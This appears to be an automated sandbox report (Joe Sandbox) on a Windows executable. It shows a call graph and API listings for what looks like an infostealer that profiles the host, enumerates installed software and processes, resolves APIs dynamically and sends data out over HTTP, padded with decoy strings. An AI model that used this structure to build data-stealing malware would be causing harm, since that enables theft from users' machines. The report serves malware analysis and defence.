ec1f69 15100->15101 15729 ec7b90 15101->15729 15103 ec1f80 15104 eca920 3 API calls 15103->15104 15105 ec1f93 15104->15105 15106 eca8a0 lstrcpy 15105->15106 15107 ec1f9c 15106->15107 15108 eca9b0 4 API calls 15107->15108 15109 ec1fc6 15108->15109 15110 eca8a0 lstrcpy 15109->15110 15111 ec1fcf 15110->15111 15112 eca9b0 4 API calls 15111->15112 15113 ec1fef 15112->15113 15114 eca8a0 lstrcpy 15113->15114 15115 ec1ff8 15114->15115 15741 ec7d80 GetSystemPowerStatus 15115->15741 15118 eca9b0 4 API calls 15119 ec2018 15118->15119 15120 eca8a0 lstrcpy 15119->15120 15121 ec2021 15120->15121 15122 eca9b0 4 API calls 15121->15122 15123 ec2040 15122->15123 15124 eca8a0 lstrcpy 15123->15124 15125 ec2049 15124->15125 15126 eca9b0 4 API calls 15125->15126 15127 ec206a 15126->15127 15128 eca8a0 lstrcpy 15127->15128 15129 ec2073 15128->15129 15130 ec207e GetCurrentProcessId 15129->15130 15743 ec9470 OpenProcess 15130->15743 15133 eca920 3 API calls 15134 ec20a4 15133->15134 15135 eca8a0 lstrcpy 15134->15135 15136 ec20ad 15135->15136 15137 eca9b0 4 API calls 15136->15137 15138 ec20d7 15137->15138 15139 eca8a0 lstrcpy 15138->15139 15140 ec20e0 15139->15140 15141 eca9b0 4 API calls 15140->15141 15142 ec2100 15141->15142 15143 eca8a0 lstrcpy 15142->15143 15144 ec2109 15143->15144 15748 ec7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 eca9b0 4 API calls 15148 ec2129 15147->15148 15149 eca8a0 lstrcpy 15148->15149 15150 ec2132 15149->15150 15151 eca9b0 4 API calls 15150->15151 15152 ec2151 15151->15152 15153 eca8a0 lstrcpy 15152->15153 15154 ec215a 15153->15154 15155 eca9b0 4 API calls 15154->15155 15156 ec217b 15155->15156 15157 eca8a0 lstrcpy 15156->15157 15158 ec2184 15157->15158 15752 ec7f60 15158->15752 15161 eca9b0 4 API calls 15162 ec21a4 15161->15162 15163 eca8a0 lstrcpy 15162->15163 15164 ec21ad 15163->15164 15165 eca9b0 4 API calls 15164->15165 15166 ec21cc 15165->15166 15167 eca8a0 lstrcpy 15166->15167 15168 ec21d5 15167->15168 15169 eca9b0 4 API calls 15168->15169 15170 ec21f6 15169->15170 15171 eca8a0 lstrcpy 15170->15171 15172 ec21ff 15171->15172 15765 ec7ed0 GetSystemInfo wsprintfA 15172->15765 15175 eca9b0 4 API calls 15176 ec221f 15175->15176 15177 eca8a0 lstrcpy 15176->15177 15178 ec2228 15177->15178 15179 eca9b0 4 API calls 15178->15179 15180 ec2247 15179->15180 15181 eca8a0 lstrcpy 15180->15181 15182 ec2250 15181->15182 15183 eca9b0 4 API calls 15182->15183 15184 ec2270 15183->15184 15185 eca8a0 lstrcpy 15184->15185 15186 ec2279 15185->15186 15767 ec8100 GetProcessHeap RtlAllocateHeap 15186->15767 15189 eca9b0 4 API calls 15190 ec2299 15189->15190 15191 eca8a0 lstrcpy 15190->15191 15192 ec22a2 15191->15192 15193 eca9b0 4 API calls 15192->15193 15194 ec22c1 15193->15194 15195 eca8a0 lstrcpy 15194->15195 15196 ec22ca 15195->15196 15197 eca9b0 4 API calls 15196->15197 15198 ec22eb 15197->15198 15199 eca8a0 lstrcpy 15198->15199 15200 ec22f4 15199->15200 15773 ec87c0 15200->15773 15203 eca920 3 API calls 15204 ec231e 15203->15204 15205 eca8a0 lstrcpy 15204->15205 15206 ec2327 15205->15206 15207 eca9b0 4 API calls 15206->15207 15208 ec2351 15207->15208 15209 eca8a0 lstrcpy 15208->15209 15210 ec235a 15209->15210 15211 eca9b0 4 API calls 15210->15211 15212 ec237a 15211->15212 15213 eca8a0 lstrcpy 15212->15213 15214 ec2383 15213->15214 15215 eca9b0 4 API calls 15214->15215 15216 ec23a2 15215->15216 15217 eca8a0 lstrcpy 15216->15217 15218 ec23ab 15217->15218 15778 ec81f0 15218->15778 15220 ec23c2 15221 eca920 3 API calls 15220->15221 15222 ec23d5 15221->15222 15223 eca8a0 lstrcpy 15222->15223 15224 ec23de 15223->15224 15225 eca9b0 4 API calls 15224->15225 15226 ec240a 15225->15226 15227 eca8a0 lstrcpy 15226->15227 15228 ec2413 15227->15228 15229 eca9b0 4 API calls 15228->15229 15230 ec2432 15229->15230 15231 eca8a0 lstrcpy 15230->15231 15232 ec243b 15231->15232 15233 eca9b0 4 API calls 15232->15233 15234 ec245c 15233->15234 15235 eca8a0 lstrcpy 15234->15235 15236 ec2465 15235->15236 15237 eca9b0 4 API calls 15236->15237 15238 ec2484 15237->15238 15239 eca8a0 lstrcpy 15238->15239 15240 ec248d 15239->15240 15241 eca9b0 4 API calls 15240->15241 15242 ec24ae 15241->15242 15243 eca8a0 lstrcpy 15242->15243 15244 ec24b7 15243->15244 15786 ec8320 15244->15786 15246 ec24d3 15247 eca920 3 API calls 15246->15247 15248 ec24e6 15247->15248 15249 eca8a0 lstrcpy 15248->15249 15250 ec24ef 15249->15250 15251 eca9b0 4 API calls 15250->15251 15252 ec2519 15251->15252 15253 eca8a0 lstrcpy 15252->15253 15254 ec2522 15253->15254 15255 eca9b0 4 API calls 15254->15255 15256 ec2543 15255->15256 15257 eca8a0 lstrcpy 15256->15257 15258 ec254c 15257->15258 15259 ec8320 17 API calls 15258->15259 15260 ec2568 15259->15260 15261 eca920 3 API calls 15260->15261 15262 ec257b 15261->15262 15263 eca8a0 lstrcpy 15262->15263 15264 ec2584 15263->15264 15265 eca9b0 4 API calls 15264->15265 15266 ec25ae 15265->15266 15267 eca8a0 lstrcpy 15266->15267 15268 ec25b7 15267->15268 15269 eca9b0 4 API calls 15268->15269 15270 ec25d6 15269->15270 15271 eca8a0 lstrcpy 15270->15271 15272 ec25df 15271->15272 15273 eca9b0 4 API calls 15272->15273 15274 ec2600 15273->15274 15275 eca8a0 lstrcpy 15274->15275 15276 ec2609 15275->15276 15822 ec8680 15276->15822 15278 ec2620 15279 eca920 3 API calls 15278->15279 15280 ec2633 15279->15280 15281 eca8a0 lstrcpy 15280->15281 15282 ec263c 15281->15282 15283 ec265a lstrlen 15282->15283 15284 ec266a 15283->15284 15285 eca740 lstrcpy 15284->15285 15286 ec267c 15285->15286 15287 eb1590 lstrcpy 15286->15287 15288 ec268d 15287->15288 15832 ec5190 15288->15832 15290 ec2699 15290->13722 16020 ecaad0 15291->16020 15293 eb5009 InternetOpenUrlA 15294 eb5021 15293->15294 15295 eb502a InternetReadFile 15294->15295 15296 eb50a0 InternetCloseHandle InternetCloseHandle 15294->15296 15295->15294 15297 eb50ec 15296->15297 15297->13726 16021 eb98d0 15298->16021 15300 ec0759 15301 ec0a38 15300->15301 15302 ec077d 15300->15302 15303 eb1590 lstrcpy 15301->15303 15305 ec0799 StrCmpCA 15302->15305 15304 ec0a49 15303->15304 16197 ec0250 15304->16197 15307 ec07a8 15305->15307 15308 ec0843 15305->15308 15310 eca7a0 lstrcpy 15307->15310 15311 ec0865 StrCmpCA 15308->15311 15312 ec07c3 15310->15312 15313 ec0874 15311->15313 15315 ec096b 15311->15315 15314 eb1590 lstrcpy 15312->15314 15316 eca740 lstrcpy 15313->15316 15317 ec080c 15314->15317 15318 ec099c StrCmpCA 15315->15318 15319 ec0881 15316->15319 15320 eca7a0 lstrcpy 15317->15320 15321 ec09ab 15318->15321 15322 ec0a2d 15318->15322 15323 eca9b0 4 API calls 15319->15323 15324 ec0823 15320->15324 15325 eb1590 lstrcpy 15321->15325 15322->13730 15326 ec08ac 15323->15326 15327 eca7a0 lstrcpy 15324->15327 15329 ec09f4 15325->15329 15330 eca920 3 API calls 15326->15330 15328 ec083e 15327->15328 16024 ebfb00 15328->16024 15332 eca7a0 lstrcpy 15329->15332 15333 ec08b3 15330->15333 15334 ec0a0d 15332->15334 15335 eca9b0 4 API calls 15333->15335 15336 eca7a0 lstrcpy 15334->15336 15337 ec08ba 15335->15337 15338 ec0a28 15336->15338 15339 eca8a0 lstrcpy 15337->15339 15672 eca7a0 lstrcpy 15671->15672 15673 eb1683 15672->15673 15674 eca7a0 lstrcpy 15673->15674 15675 eb1695 15674->15675 15676 eca7a0 lstrcpy 15675->15676 15677 eb16a7 15676->15677 15678 eca7a0 lstrcpy 15677->15678 15679 eb15a3 15678->15679 15679->14553 15681 eb47c6 15680->15681 15682 eb4838 lstrlen 15681->15682 15706 ecaad0 15682->15706 15684 eb4848 InternetCrackUrlA 15685 eb4867 15684->15685 15685->14630 15687 eca740 lstrcpy 15686->15687 15688 ec8b74 15687->15688 15689 eca740 lstrcpy 15688->15689 15690 ec8b82 GetSystemTime 15689->15690 15691 ec8b99 15690->15691 15692 eca7a0 lstrcpy 15691->15692 15693 ec8bfc 15692->15693 15693->14645 15695 eca931 15694->15695 15696 eca988 15695->15696 15698 eca968 lstrcpy lstrcat 15695->15698 15697 eca7a0 lstrcpy 15696->15697 15699 eca994 15697->15699 15698->15696 15699->14648 15700->14763 15702 eb4eee 15701->15702 15703 eb9af9 LocalAlloc 15701->15703 15702->14651 15702->14653 15703->15702 15704 eb9b14 CryptStringToBinaryA 15703->15704 15704->15702 15705 eb9b39 LocalFree 15704->15705 15705->15702 15706->15684 15707->14773 15708->14914 15709->14916 15710->14924 15839 ec77a0 15711->15839 15714 ec1c1e 15714->15006 15715 ec76c6 RegOpenKeyExA 15716 ec7704 RegCloseKey 15715->15716 15717 ec76e7 RegQueryValueExA 15715->15717 15716->15714 15717->15716 15719 ec1c99 15718->15719 15719->15020 15721 ec1e09 15720->15721 15721->15062 15723 ec7a9a wsprintfA 15722->15723 15724 ec1e84 15722->15724 15723->15724 15724->15076 15726 ec7b4d 15725->15726 15727 ec1efe 15725->15727 15846 ec8d20 LocalAlloc CharToOemW 15726->15846 15727->15090 15730 eca740 lstrcpy 15729->15730 15731 ec7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15730->15731 15740 ec7c25 15731->15740 15732 ec7d18 15734 ec7d1e LocalFree 15732->15734 15735 ec7d28 15732->15735 15733 ec7c46 GetLocaleInfoA 15733->15740 15734->15735 15736 eca7a0 lstrcpy 15735->15736 15739 ec7d37 15736->15739 15737 eca8a0 lstrcpy 15737->15740 15738 eca9b0 lstrcpy lstrlen lstrcpy lstrcat 15738->15740 15739->15103 15740->15732 15740->15733 15740->15737 15740->15738 15742 ec2008 15741->15742 15742->15118 15744 ec94b5 15743->15744 15745 ec9493 GetModuleFileNameExA CloseHandle 15743->15745 15746 eca740 lstrcpy 15744->15746 15745->15744 15747 ec2091 15746->15747 15747->15133 15749 ec7e68 RegQueryValueExA 15748->15749 15750 ec2119 15748->15750 15751 ec7e8e RegCloseKey 15749->15751 15750->15147 15751->15750 15753 ec7fb9 GetLogicalProcessorInformationEx 15752->15753 15754 ec7fd8 GetLastError 15753->15754 15758 ec8029 15753->15758 15755 ec8022 15754->15755 15761 ec7fe3 15754->15761 15757 ec2194 15755->15757 15762 ec89f0 2 API calls 15755->15762 15757->15161 15760 ec89f0 2 API calls 15758->15760 15763 ec807b 15760->15763 15761->15753 15761->15757 15847 ec89f0 15761->15847 15850 ec8a10 GetProcessHeap RtlAllocateHeap 15761->15850 15762->15757 15763->15755 15764 ec8084 wsprintfA 15763->15764 15764->15757 15766 ec220f 15765->15766 15766->15175 15768 ec89b0 15767->15768 15769 ec814d GlobalMemoryStatusEx 15768->15769 15770 ec8163 __aulldiv 15769->15770 15771 ec819b wsprintfA 15770->15771 15772 ec2289 15771->15772 15772->15189 15774 ec87fb GetProcessHeap RtlAllocateHeap wsprintfA 15773->15774 15776 eca740 lstrcpy 15774->15776 15777 ec230b 15776->15777 15777->15203 15779 eca740 lstrcpy 15778->15779 15780 ec8229 15779->15780 15781 ec8263 15780->15781 15783 eca9b0 lstrcpy lstrlen lstrcpy lstrcat 15780->15783 15785 eca8a0 lstrcpy 15780->15785 15782 eca7a0 lstrcpy 15781->15782 15784 ec82dc 15782->15784 15783->15780 15784->15220 15785->15780 15787 eca740 lstrcpy 15786->15787 15788 ec835c RegOpenKeyExA 15787->15788 15789 ec83ae 15788->15789 15790 ec83d0 15788->15790 15791 eca7a0 lstrcpy 15789->15791 15792 ec83f8 RegEnumKeyExA 15790->15792 15793 ec8613 RegCloseKey 15790->15793 15803 ec83bd 15791->15803 15794 ec860e 15792->15794 15795 ec843f wsprintfA RegOpenKeyExA 15792->15795 15796 eca7a0 lstrcpy 15793->15796 15794->15793 15797 ec8485 RegCloseKey RegCloseKey 15795->15797 15798 ec84c1 RegQueryValueExA 15795->15798 15796->15803 15799 eca7a0 lstrcpy 15797->15799 15800 ec84fa lstrlen 15798->15800 15801 ec8601 RegCloseKey 15798->15801 15799->15803 15800->15801 15802 ec8510 15800->15802 15801->15794 15804 eca9b0 4 API calls 15802->15804 15803->15246 15805 ec8527 15804->15805 15806 eca8a0 lstrcpy 15805->15806 15807 ec8533 15806->15807 15808 eca9b0 4 API calls 15807->15808 15809 ec8557 15808->15809 15810 eca8a0 lstrcpy 15809->15810 15811 ec8563 15810->15811 15812 ec856e RegQueryValueExA 15811->15812 15812->15801 15813 ec85a3 15812->15813 15814 eca9b0 4 API calls 15813->15814 15815 ec85ba 15814->15815 15816 eca8a0 lstrcpy 15815->15816 15817 ec85c6 15816->15817 15818 eca9b0 4 API calls 15817->15818 15819 ec85ea 15818->15819 15820 eca8a0 lstrcpy 15819->15820 15821 ec85f6 15820->15821 15821->15801 15823 eca740 lstrcpy 15822->15823 15824 ec86bc CreateToolhelp32Snapshot Process32First 15823->15824 15825 ec875d CloseHandle 15824->15825 15826 ec86e8 Process32Next 15824->15826 15827 eca7a0 lstrcpy 15825->15827 15826->15825 15831 ec86fd 15826->15831 15830 ec8776 15827->15830 15828 eca9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15831 15829 eca8a0 lstrcpy 15829->15831 15830->15278 15831->15826 15831->15828 15831->15829 15833 eca7a0 lstrcpy 15832->15833 15834 ec51b5 15833->15834 15835 eb1590 lstrcpy 15834->15835 15836 ec51c6 15835->15836 15851 eb5100 15836->15851 15838 ec51cf 15838->15290 15842 ec7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15839->15842 15841 ec76b9 15841->15714 15841->15715 15843 ec7765 RegQueryValueExA 15842->15843 15844 ec7780 RegCloseKey 15842->15844 15843->15844 15845 ec7793 15844->15845 15845->15841 15846->15727 15848 ec8a0c 15847->15848 15849 ec89f9 GetProcessHeap HeapFree 15847->15849 15848->15761 15849->15848 15850->15761 15852 eca7a0 lstrcpy 15851->15852 15853 eb5119 15852->15853 15854 eb47b0 2 API calls 15853->15854 15855 eb5125 15854->15855 16011 ec8ea0 15855->16011 15857 eb5184 15858 eb5192 lstrlen 15857->15858 15859 eb51a5 15858->15859 15860 ec8ea0 4 API calls 15859->15860 15861 eb51b6 15860->15861 15862 eca740 lstrcpy 15861->15862 15863 eb51c9 15862->15863 15864 eca740 lstrcpy 15863->15864 15865 eb51d6 15864->15865 15866 eca740 lstrcpy 15865->15866 15867 eb51e3 15866->15867 15868 eca740 lstrcpy 15867->15868 15869 eb51f0 15868->15869 15870 eca740 lstrcpy 15869->15870 15871 eb51fd InternetOpenA StrCmpCA 15870->15871 15872 eb522f 15871->15872 15873 eb58c4 InternetCloseHandle 15872->15873 15874 ec8b60 3 API calls 15872->15874 15882 eb58d9 ctype 15873->15882 15875 eb524e 15874->15875 15876 eca920 3 API calls 15875->15876 15877 eb5261 15876->15877 15878 eca8a0 lstrcpy 15877->15878 15879 eb526a 15878->15879 15880 eca9b0 4 API calls 15879->15880 15881 eb52ab 15880->15881 15883 eca920 3 API calls 15881->15883 15884 eca7a0 lstrcpy 15882->15884 15885 eb52b2 15883->15885 15892 eb5913 15884->15892 15886 eca9b0 4 API calls 15885->15886 15887 eb52b9 15886->15887 15888 eca8a0 lstrcpy 15887->15888 15889 eb52c2 15888->15889 15890 eca9b0 4 API calls 15889->15890 15891 eb5303 15890->15891 15893 eca920 3 API calls 15891->15893 15892->15838 15894 eb530a 15893->15894 15895 eca8a0 lstrcpy 15894->15895 15896 eb5313 15895->15896 15897 eb5329 InternetConnectA 15896->15897 15897->15873 15898 eb5359 HttpOpenRequestA 15897->15898 15900 eb58b7 InternetCloseHandle 15898->15900 15901 eb53b7 15898->15901 15900->15873 15902 eca9b0 4 API calls 15901->15902 15903 eb53cb 15902->15903 15904 eca8a0 lstrcpy 15903->15904 15905 eb53d4 15904->15905 15906 eca920 3 API calls 15905->15906 15907 eb53f2 15906->15907 15908 eca8a0 lstrcpy 15907->15908 15909 eb53fb 15908->15909 15910 eca9b0 4 API calls 15909->15910 15911 eb541a 15910->15911 15912 eca8a0 lstrcpy 15911->15912 15913 eb5423 15912->15913 15914 eca9b0 4 API calls 15913->15914 15915 eb5444 15914->15915 15916 eca8a0 lstrcpy 15915->15916 15917 eb544d 15916->15917 15918 eca9b0 4 API calls 15917->15918 15919 eb546e 15918->15919 16012 ec8ead CryptBinaryToStringA 16011->16012 16013 ec8ea9 16011->16013 16012->16013 16014 ec8ece GetProcessHeap RtlAllocateHeap 16012->16014 16013->15857 16014->16013 16015 ec8ef4 ctype 16014->16015 16016 ec8f05 CryptBinaryToStringA 16015->16016 16016->16013 16020->15293 16263 eb9880 16021->16263 16023 eb98e1 16023->15300 16025 eca740 lstrcpy 16024->16025 16026 ebfb16 16025->16026 16198 eca740 lstrcpy 16197->16198 16199 ec0266 16198->16199 16200 ec8de0 2 API calls 16199->16200 16201 ec027b 16200->16201 16202 eca920 3 API calls 16201->16202 16203 ec028b 16202->16203 16204 eca8a0 lstrcpy 16203->16204 16205 ec0294 16204->16205 16206 eca9b0 4 API calls 16205->16206 16264 eb988e 16263->16264 16267 eb6fb0 16264->16267 16266 eb98ad ctype 16266->16023 16270 eb6d40 16267->16270 16271 eb6d63 16270->16271 16284 eb6d59 16270->16284 16286 eb6530 16271->16286 16275 eb6dbe 16275->16284 16296 eb69b0 16275->16296 16277 eb6e2a 16278 eb6ef7 16277->16278 16279 eb6ee6 VirtualFree 16277->16279 16277->16284 16281 eb6f38 16278->16281 16282 eb6f26 FreeLibrary 16278->16282 16285 eb6f41 16278->16285 16279->16278 16280 ec89f0 2 API calls 16280->16284 16283 ec89f0 2 API calls 16281->16283 16282->16278 16283->16285 16284->16266 16285->16280 16285->16284 16287 eb6542 16286->16287 16289 eb6549 16287->16289 16306 ec8a10 GetProcessHeap RtlAllocateHeap 16287->16306 16289->16284 16290 eb6660 16289->16290 16295 eb668f VirtualAlloc 16290->16295 16292 eb6730 16293 eb673c 16292->16293 16294 eb6743 VirtualAlloc 16292->16294 16293->16275 16294->16293 16295->16292 16295->16293 16297 eb69c9 16296->16297 16301 eb69d5 16296->16301 16298 eb6a09 LoadLibraryA 16297->16298 16297->16301 16299 eb6a32 16298->16299 16298->16301 16305 eb6ae0 16299->16305 16307 ec8a10 GetProcessHeap RtlAllocateHeap 16299->16307 16301->16277 16302 eb6ba8 GetProcAddress 16302->16301 16302->16305 16303 ec89f0 2 API calls 16303->16305 16304 eb6a8b 16304->16301 16304->16303 16305->16301 16305->16302 16306->16289 16307->16304

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 ec9860-ec9874 call ec9750 663 ec987a-ec9a8e call ec9780 GetProcAddress * 21 660->663 664 ec9a93-ec9af2 LoadLibraryA * 5 660->664 663->664 666 ec9b0d-ec9b14 664->666 667 ec9af4-ec9b08 GetProcAddress 664->667 669 ec9b46-ec9b4d 666->669 670 ec9b16-ec9b41 GetProcAddress * 2 666->670 667->666 671 ec9b4f-ec9b63 GetProcAddress 669->671 672 ec9b68-ec9b6f 669->672 670->669 671->672 673 ec9b89-ec9b90 672->673 674 ec9b71-ec9b84 GetProcAddress 672->674 675 ec9bc1-ec9bc2 673->675 676 ec9b92-ec9bbc GetProcAddress * 2 673->676 674->673 676->675
                            APIs
                            • GetProcAddress.KERNEL32(76F70000,00A90660), ref: 00EC98A1
                            • GetProcAddress.KERNEL32(76F70000,00A907E0), ref: 00EC98BA
                            • GetProcAddress.KERNEL32(76F70000,00A906A8), ref: 00EC98D2
                            • GetProcAddress.KERNEL32(76F70000,00A907C8), ref: 00EC98EA
                            • GetProcAddress.KERNEL32(76F70000,00A90768), ref: 00EC9903
                            • GetProcAddress.KERNEL32(76F70000,00A98B28), ref: 00EC991B
                            • GetProcAddress.KERNEL32(76F70000,00A86240), ref: 00EC9933
                            • GetProcAddress.KERNEL32(76F70000,00A861E0), ref: 00EC994C
                            • GetProcAddress.KERNEL32(76F70000,00A906D8), ref: 00EC9964
                            • GetProcAddress.KERNEL32(76F70000,00A90570), ref: 00EC997C
                            • GetProcAddress.KERNEL32(76F70000,00A90588), ref: 00EC9995
                            • GetProcAddress.KERNEL32(76F70000,00A906F0), ref: 00EC99AD
                            • GetProcAddress.KERNEL32(76F70000,00A86480), ref: 00EC99C5
                            • GetProcAddress.KERNEL32(76F70000,00A90708), ref: 00EC99DE
                            • GetProcAddress.KERNEL32(76F70000,00A90750), ref: 00EC99F6
                            • GetProcAddress.KERNEL32(76F70000,00A863C0), ref: 00EC9A0E
                            • GetProcAddress.KERNEL32(76F70000,00A90780), ref: 00EC9A27
                            • GetProcAddress.KERNEL32(76F70000,00A90828), ref: 00EC9A3F
                            • GetProcAddress.KERNEL32(76F70000,00A86260), ref: 00EC9A57
                            • GetProcAddress.KERNEL32(76F70000,00A90810), ref: 00EC9A70
                            • GetProcAddress.KERNEL32(76F70000,00A86200), ref: 00EC9A88
                            • LoadLibraryA.KERNEL32(00A908D0,?,00EC6A00), ref: 00EC9A9A
                            • LoadLibraryA.KERNEL32(00A908B8,?,00EC6A00), ref: 00EC9AAB
                            • LoadLibraryA.KERNEL32(00A90840,?,00EC6A00), ref: 00EC9ABD
                            • LoadLibraryA.KERNEL32(00A90858,?,00EC6A00), ref: 00EC9ACF
                            • LoadLibraryA.KERNEL32(00A90870,?,00EC6A00), ref: 00EC9AE0
                            • GetProcAddress.KERNEL32(76DA0000,00A90888), ref: 00EC9B02
                            • GetProcAddress.KERNEL32(75840000,00A908A0), ref: 00EC9B23
                            • GetProcAddress.KERNEL32(75840000,00A98F10), ref: 00EC9B3B
                            • GetProcAddress.KERNEL32(753A0000,00A98F28), ref: 00EC9B5D
                            • GetProcAddress.KERNEL32(77300000,00A86580), ref: 00EC9B7E
                            • GetProcAddress.KERNEL32(774D0000,00A98AA8), ref: 00EC9B9F
                            • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 00EC9BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00EC9BAA
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: c39025a9f0a16da9e4d1375d4e59fd52fffa7723fdc454d260c3815cae0b6ff2
                            • Instruction ID: 4e58f190b9978df0907f180040ffb3aed2576488b51b223eb8decdfabf22b138
                            • Opcode Fuzzy Hash: c39025a9f0a16da9e4d1375d4e59fd52fffa7723fdc454d260c3815cae0b6ff2
                            • Instruction Fuzzy Hash: A2A12EB5700241DFD364DBA9E98AE5637F9F78C341B04851EA68E83A4CD77FA442CB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 eb45c0-eb4695 RtlAllocateHeap 781 eb46a0-eb46a6 764->781 782 eb474f-eb47a9 VirtualProtect 781->782 783 eb46ac-eb474a 781->783 783->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00EB479C
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB46CD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB474F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB473F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB46D8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4662
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4770
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB45F3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB46AC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4678
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4765
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB45D2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB46B7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB46C2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB475A
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4657
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB45C7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4683
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB466D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB477B
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB45E8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4734
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4713
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB471E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB4622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00EB462D
